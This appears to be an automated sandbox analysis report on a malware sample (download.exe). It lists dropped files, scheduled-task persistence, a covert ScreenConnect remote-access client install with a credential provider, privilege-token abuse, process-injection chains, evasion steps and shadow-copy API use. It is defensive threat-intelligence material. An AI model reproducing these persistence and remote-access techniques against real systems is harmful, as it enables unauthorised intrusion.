File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\e589d25.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e589d27.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
File opened for modification C:\Windows\Installer\MSI9E2F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA17D.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e589d25.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{933D173F-6496-0F7D-53C4-FF46268B901A}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Gxtuum.job N/A N/A
File created C:\Windows\Tasks\Test Task17.job N/A N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{933D173F-6496-0F7D-53C4-FF46268B901A} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9E5F.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000622eb924184734490000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000622eb9240000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900622eb924000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d622eb924000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000622eb92400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A N/A N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Version = "402915332" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1\Full C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\PackageCode = "F371D3396946D7F0354CFF6462B809A1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductName = "ScreenConnect Client (3be09d9e5e840c20)" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\ = "ScreenConnect Client (3be09d9e5e840c20) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductIcon = "C:\\Windows\\Installer\\{933D173F-6496-0F7D-53C4-FF46268B901A}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4320 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
PID 3516 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe
PID 5064 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3516 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe
PID 4320 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe
PID 3228 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 5052 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 3228 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe
PID 3228 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe
PID 4476 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe C:\Windows\SysWOW64\msiexec.exe
PID 524 wrote to memory of 3768 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3768 wrote to memory of 4064 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 3228 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe
PID 524 wrote to memory of 3096 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 524 wrote to memory of 4400 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 524 wrote to memory of 32 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3088 wrote to memory of 992 N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe
PID 3088 wrote to memory of 3040 N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe
PID 3228 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
PID 3920 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
PID 3920 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5052 -ip 5052

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 960

C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe

"C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe"

C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe

"C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

